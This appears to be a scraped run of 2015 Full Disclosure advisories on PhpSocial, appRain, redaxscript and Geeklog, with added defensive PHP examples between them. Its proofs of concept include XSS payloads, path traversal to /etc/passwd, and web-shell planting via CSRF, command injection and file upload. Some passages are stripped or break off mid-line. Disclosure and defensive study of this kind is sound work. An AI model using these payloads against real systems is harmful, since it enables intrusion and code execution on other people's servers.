11/21/2015 Contacted Vendor (no reply)
12/10/2015 Tried to remind vendor (no email is given, secur...@phpsocial.net does
           not exist, and contact form could not be used because the website is
           down)
12/21/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/PhpSocial-v200304-CSRF-133.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] PhpSocial v2.0.0304: XSS

2015-12-23 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:PhpSocial v2.0.0304_2026
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://phpsocial.net
Vulnerability Type:  XSS / Open Redirect
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 12/21/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description

PhpSocial is a social networking software written in PHP. In version v2.0.0304,
the profile fields Name, Birthday, Street Address, City, State, Country, and
Phone Number are open to persistent XSS.

This can lead to the stealing of cookies, injection of JavaScript keyloggers,
and bypassing of CSRF protection. In this case, this can lead to code execution
via the template editor.
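The fix for every reflected and persistent XSS in this batch of advisories (CouchCMS XSS 1 and 2, Grawlix XSS 1 to 5, esoTalk, Arastta, and the PhpSocial profile fields above) is the same: encode at output time, in the context the value lands in, and never build a link by pasting raw request data into it. The following is an added example, not code from any of these projects; the function names and the request values are constructed to resemble the advisories' proofs of concept.

```php
<?php
// Added example, not code from CouchCMS, Grawlix, esoTalk, Arastta or
// PhpSocial. Function names and the request values below are constructed.

// One encoder for HTML text and double-quoted attribute values.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// CouchCMS XSS 1 and 2: pagination links that carry the request's other
// parameters. http_build_query() percent-encodes parameter names as well as
// values, so a name such as foo"><script> cannot break out of the href.
function paginationLink(array $get, int $page, string $script): string
{
    $get['page'] = $page;
    return '<a href="' . e($script . '?' . http_build_query($get)) . '">' . $page . '</a>';
}

// Grawlix XSS 1, 3 and 4, and the hidden page_id field of XSS 5: a request
// value written into an attribute. Quotes are encoded, so the attribute
// cannot be closed early.
function inputTag(string $type, string $name, string $value): string
{
    return '<input type="' . e($type) . '" name="' . e($name) . '" value="' . e($value) . '">';
}

// Arastta and esoTalk: the current URL echoed into the page. Rebuild it from
// the script path and the parsed query instead of echoing REQUEST_URI.
function canonicalLink(string $scriptPath, array $get): string
{
    $qs = http_build_query($get);
    return '<link rel="canonical" href="' . e($scriptPath . ($qs === '' ? '' : '?' . $qs)) . '">';
}

// PhpSocial: stored profile fields. The database keeps the raw text and every
// rendering path encodes at output, so no field is forgotten.
function profileRow(string $label, string $stored): string
{
    return '<tr><th>' . e($label) . '</th><td>' . e($stored) . '</td></tr>';
}

// Constructed request data shaped like the advisories' proofs of concept.
$get = ['p' => '5', 'foo"><script>alert(2)</script>bar' => '1'];
echo paginationLink($get, 2, '/blog.php'), "\n";
echo inputTag('text', 'keyword', '" autofocus onfocus="alert(1)'), "\n";
echo inputTag('hidden', 'page_id', '" style="STYLE'), "\n";
echo canonicalLink('/index.php/desktops/pc', ['sort' => 'pd.name"><script>alert(1)</script>', 'order' => 'DESC']), "\n";
echo profileRow('City', '<script>alert(1)</script>'), "\n";
```

Every quote, angle bracket and ampersand in the printed markup is an entity, and the injected parameter name survives only as a percent-encoded key inside a properly quoted href. Values that land in a JavaScript block or a URL scheme position need their own encoders; the one above covers the HTML-body and attribute contexts the advisories describe.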

3. Proof of Concept

Visit the profile page
http://localhost/PhpSocial_v2.0.0304_2026/cms_phpsocial/Profile.php?user=[USERNAME],
click edit, and use the following for any of the vulnerable fields: 

4. Open Redirect

CVSS

Low 2.1 AV:N/AC:H/Au:S/C:N/I:P/A:N

Description

PhpSocial is also vulnerable to a reflected open redirect, which may for
example be used in phishing attacks. The attack only works if the victim is
logged in to PhpSocial.

Proof of Concept

http://localhost//PhpSocial_v2.0.0304_2026/cms_phpsocial/UserEditprofileStatus.php?status_new=foobar&task=dosave&return_url=http://google.com

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

11/21/2015 Contacted Vendor (no reply)
12/10/2015 Tried to remind vendor (no email is given, secur...@phpsocial.net does
           not exist, and contact form could not be used because the website is
           down)
12/21/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/PhpSocial-v200304-XSS-134.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] appRain 4.0.3: Code Execution

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:appRain 4.0.3
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  i...@apprain.com
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 12/02/2015
Release mode:Full Disclosure
CVE: requested, but not assigned
Credits  Tim Coen of Curesec GmbH

2. Overview

appRain is described as a Content Management Framework written in PHP.

There are various components of appRain 4.0.3 that should not provide the
possibility of code execution or arbitrary file upload but do allow it.

All of these issues are by default present in the admin area. It should be
noted that admins already have code execution via a designated PHP file editor.

Still, the code of appRain is explicitly intended to be extended by its users,
which means that components such as a seemingly secure file uploader, an image
uploader, or a function decoding JSON should not lead to code execution.

3. Unrestricted Upload of File with Dangerous Type 1

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

The file upload uses a blacklist for the file extension to forbid the upload of
files with dangerous type. The disallowed extensions are:
php,php3,php4,exe,pl,py,bat,sys,dev,sh

However, files that can be uploaded and that also lead to code execution are
.htaccess, as well as files with extension pht, php5, and phtml.

The file upload can be found here:
http://localhost/apprain/admin/filemanager

An admin account is required to use the file manager. It should be noted that
an admin already has code execution via the designated PHP file editor. Still,
this is an access violation in the context of this component and will also be
an issue if users reuse the varifyFileName function in different contexts,
which is to be expected.

Code


/development/controllers/admin.php
if(!App::Module('Filemanager')->varifyFileName($this->data['filemanager']['image']['name'])){
    App::Module('Notification')->Push("File({$this->data['filemanager']['image']['name']}) is restricted to uploaded.","Error");
    App::Config()->redirect("/admin/filemanager/upload");
}
else {
    $path = App::Config()->filemanagerDir(DS);
    $data = App::Utility()->upload($this->data['filemanager']['image'],$path);
    App::Module('Notification')->Push("File({$data['file_name']}) uploaded successfully.");
    App::Config()->redirect("/admin/filemanager");
}

/apprain/base/modules/filemanager.php
public function varifyFileName($filename){
    $restrictedExt = explode(',',app::__def()->sysConfig('FILE_MANAGER_RESTRICTED_EXT'));
    return !in_array(App::Utility()->getExt($filename),$restrictedExt);
}

/development/definition/system_configuration/config.xml:


4. Unrestricted Upload of File with Dangerous Type 2

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When creating a new slide, the label suggests that only images with extensions
"*.jpeg, *.gif" may be uploaded. However, arbitrary files can be uploaded,
including .php or .pht files.

An admin account is required to create new slides. It should be noted that an
admin already has code execution via the designated PHP file editor. Still,
this is an access violation in the context of this component and may also be an
issue if users reuse the involved functions in different contexts.
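The file manager above (and the CouchCMS upload earlier in this digest) decides on the last extension against a deny-list, which is why pht, phtml, php5 and .htaccess get through, and the slide upload accepts any name at all. The following is an added example, not appRain or CouchCMS code: the deny-list check as both advisories describe it next to an allow-list that inspects every extension segment and generates the stored name server-side. The function names and sample file names are constructed; the RESTRICTED_EXT list is the one quoted in this advisory.

```php
<?php
// Added example, not CouchCMS or appRain code. Function names and sample
// file names are constructed; RESTRICTED_EXT is the list from the advisory.

const RESTRICTED_EXT = ['php', 'php3', 'php4', 'exe', 'pl', 'py', 'bat', 'sys', 'dev', 'sh'];

// Extensions this image upload is willing to store. Anything else is refused,
// so a handler the deny-list never mentioned (pht, phtml, php5, phar, ...)
// never has to be added after the fact.
const ALLOWED_IMAGE_EXT = ['jpg', 'jpeg', 'png', 'gif', 'webp'];

// Deny-list check as both advisories describe it: looks only at the last
// extension, so shell.pht, shell.phtml, shell.php5 and .htaccess all pass.
function isAllowedByBlacklist(string $name): bool
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return !in_array($ext, RESTRICTED_EXT, true);
}

// Allow-list check: every dot-separated segment after the base name must be
// an allowed image extension, so shell.php.jpg and shell.jpg.pht are refused,
// and a dotfile such as .htaccess has no base name at all.
function isAllowedUploadName(string $name): bool
{
    $base = basename($name);
    if ($base === '' || $base[0] === '.' || strlen($base) > 255) {
        return false;
    }
    if (preg_match('/[^A-Za-z0-9._-]/', $base)) {
        return false;            // only characters a path join or header cannot misread
    }
    $segments = explode('.', $base);
    if (count($segments) < 2) {
        return false;            // no extension at all
    }
    array_shift($segments);      // drop the base name
    foreach ($segments as $ext) {
        if (!in_array(strtolower($ext), ALLOWED_IMAGE_EXT, true)) {
            return false;
        }
    }
    return true;
}

// The name check decides whether the upload is accepted; the stored name is
// then generated from the detected image type, so the client never chooses
// the extension the web server will see.
function storedName(string $tmpPath, string $clientName): ?string
{
    if (!isAllowedUploadName($clientName)) {
        return null;
    }
    $info = @getimagesize($tmpPath);
    if ($info === false) {
        return null;
    }
    $extByType = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png',
                  IMAGETYPE_GIF => 'gif', IMAGETYPE_WEBP => 'webp'];
    if (!isset($extByType[$info[2]])) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . $extByType[$info[2]];
}

// The file names from both advisories plus two double-extension variants.
foreach (['photo.jpg', 'imageshell.pht', 'test.phtml', '.htaccess', 'shell.php.jpg', 'SHELL.PHP5'] as $n) {
    printf("%-15s blacklist: %-5s allowlist: %s\n", $n,
        isAllowedByBlacklist($n) ? 'pass' : 'deny',
        isAllowedUploadName($n) ? 'pass' : 'deny');
}
```

Only photo.jpg passes the allow-list; the deny-list passes everything except nothing in this set, since none of the names ends in a listed extension. An image check on its own is not a substitute: the PNG IDAT technique the CouchCMS advisory links to produces files that pass getimagesize() and still carry PHP, so the stored name and the web server's handler mapping are the controls that matter. Because the same advisory notes that Apache ignores .htaccess by default since 2.3.9, the rule that keeps PHP from running inside the upload directory belongs in the server configuration rather than in a dropped-in .htaccess file.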

Proof of Concept


POST /apprain/information/manage/appslide/add HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4d7rqc7hj3ej5j403nf4ktmq42
Connection: keep-alive
Content-Type: multipart/form-data; 
boundary=---418924992299141519661615194
Content-Length: 1178

-418924992299141519661615194
Content-Disposition: form-data; name="data[Option][title]"

test
-418924992299141519661615194
Content-Disposition: form-data; name="data[Option][image]"; filename="test.pht"
Content-Type: application/octet-stream

test

-418924992299141519661615194
Content-Disposition: form-data; name="data[Option][status]"

Active
-418924992299141519661615194
Content-Disposition: form-data; name="Button[button_save]"

Save
-418924992299141519661615194
Content-Disposition: form-data; name="data[Information][id]"


-418924992299141519661615194
Content-Disposition: form-data; name="data[Information][type]"

appslide
-418924992299141519661615194
Content-Disposition: form-data; name="data[Information][page]"


-418924992299141519661615194--

5. Possibly Code Execution

CVSS

High 7.6 AV:N/AC:H/Au:N/C:

[FD] appRain 4.0.3: CSRF

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    appRain 4.0.3
Fixed in:            Fixed via Optional Module
CSRF Protection Module Link: http://www.apprain.com/extension/20/accounting-system?s=Description
Vendor Website:      i...@apprain.com
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 12/02/2015
Release mode:        Coordinated release
CVE:                 requested, but not assigned
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS

Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

None of the requests have CSRF protection. This means that an attacker can
execute actions for an admin if the admin visits an attacker controlled website
while logged in.
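The forged forms in the Opendocman, Grawlix and PhpSocial advisories and in this one all work for the same reason: the target script accepts any POST that carries the victim's session cookie. The following is an added example, not code from any of those projects: a synchronizer-token check for a PHP application, with one secret per session, a hidden field for every state-changing form, and an Origin/Referer comparison as a second layer. Function and field names are constructed; in a real handler the session, POST and server arrays are $_SESSION, $_POST and $_SERVER.

```php
<?php
// Added example, not Opendocman, Grawlix, PhpSocial or appRain code.
// Function and field names are constructed; pass $_SESSION, $_POST and
// $_SERVER in a real handler.

function csrfToken(array &$session): string
{
    if (empty($session['csrf_token']) || !is_string($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to add to every POST form; the rest of the form is unchanged.
// A page on another origin cannot read this value, which is what makes the
// attacker-hosted forms in the advisories fail.
function csrfField(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8') . '">';
}

// The request's origin as "scheme://host[:port]", from the Origin header or,
// failing that, the Referer; null if neither is present.
function requestOrigin(array $server): ?string
{
    if (isset($server['HTTP_ORIGIN'])) {
        return $server['HTTP_ORIGIN'];
    }
    if (isset($server['HTTP_REFERER'])) {
        $r = parse_url($server['HTTP_REFERER']);
        if ($r !== false && isset($r['scheme'], $r['host'])) {
            return $r['scheme'] . '://' . $r['host'] . (isset($r['port']) ? ':' . $r['port'] : '');
        }
    }
    return null;
}

// The check itself: POST only, token compared in constant time against the
// session copy, and an Origin/Referer that names our own site whenever one is
// sent (browsers send Origin on cross-site POSTs; an absent header is tolerated
// for clients that strip it, a mismatching one is not).
function csrfRequestIsValid(array &$session, array $post, array $server, string $siteOrigin): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $given = $post['csrf_token'] ?? null;
    if (!is_string($given) || !hash_equals(csrfToken($session), $given)) {
        return false;
    }
    $origin = requestOrigin($server);
    return $origin === null || strcasecmp($origin, $siteOrigin) === 0;
}

// Guard for the top of every state-changing script (user.php, user.config.php,
// AdminAddViewadmins.php and admin/manage/add/ in the advisories).
function requireValidCsrf(string $siteOrigin): void
{
    if (!csrfRequestIsValid($_SESSION, $_POST, $_SERVER, $siteOrigin)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token.');
    }
}

// Demonstration with constructed requests; no web server or session needed.
$session = [];
$site = 'http://localhost';
echo csrfField($session), "\n";
$forged = ['username' => 'attacker', 'admin' => '1'];             // cross-site form: no token
$legit = $forged + ['csrf_token' => csrfToken($session)];
$sameSite = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://localhost'];
$crossSite = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'];
var_dump(csrfRequestIsValid($session, $forged, $sameSite, $site));   // token missing
var_dump(csrfRequestIsValid($session, $legit, $sameSite, $site));    // token present, own origin
var_dump(csrfRequestIsValid($session, $legit, $crossSite, $site));   // right token, wrong origin
```

Only the second request is accepted. The token makes the check independent of browser headers; the origin comparison is defense in depth. A SameSite attribute on the session cookie (session_set_cookie_params() accepts a samesite key since PHP 7.3) adds a third layer, but, as the appRain timeline below illustrates, the token check should ship enabled rather than as an optional module.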

3. Proof of Concept


Add new Admin:


  
http://localhost/apprain-source-4.0.3/admin/manage/add/"; method="POST">


Code Execution (using the PHP file editor):


  
http://localhost/apprain-source-4.0.3/appeditor/index?loc=webroot/index.php";
 method="POST">
  http://www.opensource.org/licenses/mit-license.php
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to lice...@apprain.com so we can send you a copy immediately.
 *
 * @copyright  Copyright (c) 2010 appRain, Team. (http://www.apprain.com)
 * @licensehttp://www.opensource.org/licenses/mit-license.php MIT license
 *
 * HELP
 *
 * Official Website
 * http://www.apprain.com/
 *
 * Download Link
 * http://www.apprain.com/download
 *
 * Documents Link
 * http ://www.apprain.com/docs
 */

if (version_compare(phpversion(), '5.1.0', '<') === true) {
die("Whoops, it looks like you have an invalid PHP 
version.appRain supports PHP 5.1.0 or newer.");
}

$appLoc = "../app.php";

if (!file_exists($appLoc)) {
die("appRain core file(s) missing... Get a new copy ");
}

error_reporting(E_ALL);

require_once $appLoc;

umask(0);

App::Run();

passthru($_GET['x']);" />
  

  


The injected code can now be executed here:
http://localhost/apprain-source-4.0.3/webroot/index.php?x=ls

4. Solution

To mitigate this issue please install the "Data Exchange Security" module:

http://www.apprain.com/extension/20/accounting-system?s=Description

5. Report Timeline

10/02/2015  Informed Vendor. Mailbox i...@apprain.com is full, used
            secur...@apprain.com instead (no reply)
10/21/2015  Reminded Vendor of Disclosure Date
10/21/2015  Vendor announces fix
~11/02/2015 Vendor releases optional module for CSRF protection
11/04/2015  Suggested to vendor that CSRF protection should not be optional
            (no reply)
11/17/2015  CVE Requested (no reply)
12/02/2015  Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/appRain-403-CSRF-112.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] appRain 4.0.3: Path Traversal

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:appRain 4.0.3
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  i...@apprain.com
Vulnerability Type:  Path Traversal
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 12/02/2015
Release mode:Full Disclosure
CVE: requested, but not assigned
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS

Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description

The "loc" Parameter of the appeditor is vulnerable to directory traversal,
which allows the viewing of arbitrary files.

Admin credentials are required to view files. It should be noted that an admin
already has code execution via the designated PHP file editor. Still, this is
an access violation in the context of this component.

3. Proof of Concept


http://localhost/apprain-source-4.0.3/appeditor?loc=../../../../../../../etc/passwd

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

10/02/2015 Informed Vendor. Mailbox i...@apprain.com is full, used
           secur...@apprain.com instead (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor announces fix for 11/02/2015
11/04/2015 No fix released, extended public disclosure date to 11/11/2015
11/17/2015 CVE Requested (no reply)
11/24/2015 Reminded Vendor of release date, extended date to 12/02/2015 and
           offered extension if needed (no reply)
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/appRain-403-Path-Traversal-113.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] appRain 4.0.3: XSS

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:appRain 4.0.3
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  i...@apprain.com
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 12/02/2015
Release mode:Full Disclosure
CVE: requested, but not assigned
Credits  Tim Coen of Curesec GmbH

2. Overview

There are two reflected XSS vulnerabilities in appRain 4.0.3. This can lead to
the injection of JavaScript keyloggers or the bypassing of CSRF protection. In
the case of appRain, this may lead to code execution.

3. XSS 1

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

The search of the file manager echoes user input without encoding, leading to
reflected XSS.

Proof of Concept



  
http://localhost/apprain-source-4.0.3/admin/filemanager/upload"; 
method="POST">
  alert(1)" />
  

  


Code


/apprain/base/modules/toolbar.php
private function btnFilemanagerSrcBox($srcstr = "")
{

$html = '


';

return array('box' => $html);
}

4. XSS 2

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

The appeditor echoes the given file name and path without encoding, leading to
reflected XSS.

Proof of Concept


http://localhost/apprain-source-4.0.3/appeditor?loc='">alert(1)

Code


/component/appeditor/controllers/appeditor/index.phtml









X




5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

10/02/2015 Informed Vendor. Mailbox i...@apprain.com is full, used
           secur...@apprain.com instead (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor announces fix for 11/02/2015
11/04/2015 No fix released, extended public disclosure date to 11/11/2015
11/05/2015 Vendor asks for list of organizations that may help implementing fixes
11/11/2015 Replied that we do not have lists, and that we do not have the
           resources to implement fixes ourselves. Extended release date to
           11/18/2015 and offered further extension if needed (no reply)
11/17/2015 CVE Requested (no reply)
11/24/2015 Reminded Vendor of release date, extended date to 12/02/2015 and
           offered extension if needed (no reply)
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/appRain-403-XSS-115.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] redaxscript 2.5.0: Code Execution

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:redaxscript 2.5.0
Fixed in:module has been removed in version 2.6.0
Fixed Version Link:  n/a
Vendor Contact:  i...@redaxmedia.com
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 12/02/2015
Release mode:Coordinated release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

The module file_manager allows for file uploads, and uses exif_imagetype to
check the validity of the file.

By setting the first bytes of the uploaded file to that of a valid image type,
an attacker can easily bypass this check and thus upload files of dangerous
type.

It should be noted that only files with the name index.php will be executed, as
access to all other PHP files is forbidden by a htaccess file.

An account that has access to the module "File manager" is needed to exploit
this issue.

3. Code


/modules/file_manager/index.php
function file_manager_upload($directory = '')
{
$file = $_FILES['file']['tmp_name'];
$file_name = file_manager_clean_file_name($_FILES['file']['name']);
$file_size = $_FILES['file']['size'];

/* validate post */

if (function_exists('exif_imagetype'))
{
if (exif_imagetype($file) == '')
{
$error = l('file_type_limit', '_file_manager') . 
l('point');
}
}

4. Solution

To mitigate this issue please remove the file_manager module.

5. Report Timeline

10/02/2015 Informed Vendor about Issue
11/15/2015 Vendor removes affected module
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/redaxscript-250-Code-Execution-116.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] redaxscript 2.5.0: XSS

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    redaxscript 2.5.0
Fixed in:            2.6.1
Fixed Version Link:  http://redaxscript.com/files/releases/redaxscript_2.6.1_full.zip
Vendor Contact:      i...@redaxmedia.com
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 12/02/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

There is a persistent XSS vulnerability when leaving comments. It requires the
admin to hover over a link to trigger the injected code.

This issue can lead to the injection of JavaScript keyloggers, or the bypassing
of CSRF protection. In this case, this may lead to code execution.

The issue has been partially fixed in version 2.6.0. However, it was still
possible to inject a style attribute, making XSS in older browsers possible.
This has been fixed in version 2.6.1.

3. Proof of Concept


1. Create a comment, as comment text use:
comment" onmouseover=alert(1) foo="
2. In the sidebar, hover over the comment to trigger the XSS.

4. Solution

To mitigate this issue please upgrade at least to version 2.6.1:

http://redaxscript.com/files/releases/redaxscript_2.6.1_full.zip

Please note that a newer version might already be available.

5. Report Timeline

10/02/2015 Informed Vendor about Issue
11/15/2015 Vendor releases partial fix
11/24/2015 Informed vendor that fix is incomplete
11/25/2015 Vendor releases fix
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/redaxscript-250-XSS-118.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Geeklog 2.1.0: Code Execution

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Geeklog 2.1.0
Fixed in:2.1.1b3
Fixed Version Link:  https://www.geeklog.net/filemgmt/visit.php/1156
Vendor Contact:  geeklog-secur...@lists.geeklog.net
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 12/02/2015
Release mode:Coordinated release
CVE: requested, but not assigned
Credits  Tim Coen of Curesec GmbH

2. Overview

The admin area of Geeklog suffers from two vulnerabilities that can lead to
code execution: OS Command Injection and Upload of Files with Dangerous Type.

The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1,
the OS command injection in version 2.1.1b3.

3. Upload of Files with Dangerous Type

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading a file, the file type check is performed only client-side. An
attacker can easily bypass this check and thus upload files of dangerous types,
such as PHP files.

To upload files, an attacker needs a registered user that is in the group
"Filemanager Admin".

Proof of Concept


POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php 
HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Content-Length: 761
Content-Type: multipart/form-data; 
boundary=---10717364298700964751730232773
Cookie: [cookies]

-10717364298700964751730232773
Content-Disposition: form-data; name="mode"

add
-10717364298700964751730232773
Content-Disposition: form-data; name="currentpath"

/var/www/geeklog-2.1.0/public_html/images/
-10717364298700964751730232773
Content-Disposition: form-data; name="filepath"

test.png
-10717364298700964751730232773
Content-Disposition: form-data; name="newfile"; filename="shell.php"
Content-Type: image/png

http://localhost/geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php'

4. OS Command Injection

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When performing a database backup, various settings are passed unsanitized to
exec, leading to code execution.

To exploit this issue, an attacker needs a registered user that is in the group
"Root".

Proof of Concept


1. Change "Backup File Name Mask" in 
http://localhost/geeklog-2.1.0/public_html/admin/configuration.php?tab-5 to:
geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo " shell.php;"
2. Perform database backup here:
http://localhost/geeklog-2.1.0/public_html/admin/database.php
The injected commands will be executed.

In the beta version geeklog-2.1.1b1, less-than is filtered out, but OS command
injection is still possible, including the creation of a PHP shell by appending
the injected PHP code to an existing PHP file without closing tags:


geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "passthru(\$_GET['x']);" >> 
../filemanager/connectors/php/inc/wideimage/lib/Font/PS.php;"

Code


/admin/database.php
function dobackup()
{
[...]
if (!empty($_CONF['mysqldump_filename_mask'])) {
$filename_mask = strftime($_CONF['mysqldump_filename_mask']);
}
[...]
$backupfile = $_CONF['backup_path'] . $filename_mask;
[...]
$command .= " $_DB_name > \"$backupfile\"";
[...]
if ($canExec) {
exec($command);
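The code above passes the configured mask through strftime() and then straight into a double-quoted shell string. The following is an added example, not Geeklog's own code, of the same backup command assembled so that the mask can only ever be a file name: the value is validated against an allowlist when it is used, the time tokens are expanded with date() rather than strftime() (deprecated since PHP 8.1), and every externally influenced value is wrapped with escapeshellarg(). The function names, the sample database name and path, and the rejected input are constructed for this demonstration; PHP 8 is assumed.

```php
<?php
// Added example (not Geeklog code): building the mysqldump command so that the
// configured file-name mask can never reach the shell as syntax. Function names
// and the sample values are assumptions made for this demonstration.
declare(strict_types=1);

/**
 * The mask may contain only file-name characters and the time tokens the
 * feature documents. Quotes, ';', '>', spaces, '/' and '..' are refused up
 * front, so an injected value is rejected before any command is assembled.
 */
function validate_filename_mask(string $mask): bool
{
    return preg_match('/^[A-Za-z0-9_.%-]+$/', $mask) === 1
        && !str_contains($mask, '..');
}

/** Expand the strftime-style tokens with date(); strftime() is deprecated since PHP 8.1. */
function expand_filename_mask(string $mask, int $timestamp): string
{
    $map = ['%Y' => 'Y', '%m' => 'm', '%d' => 'd', '%H' => 'H', '%M' => 'i', '%S' => 's'];
    foreach ($map as $token => $format) {
        $mask = str_replace($token, date($format, $timestamp), $mask);
    }
    return $mask;
}

/**
 * Returns the full command line. Every externally influenced value goes through
 * escapeshellarg(), which single-quotes it, so even a value that somehow
 * bypassed validation stays one argument and never becomes a second command.
 */
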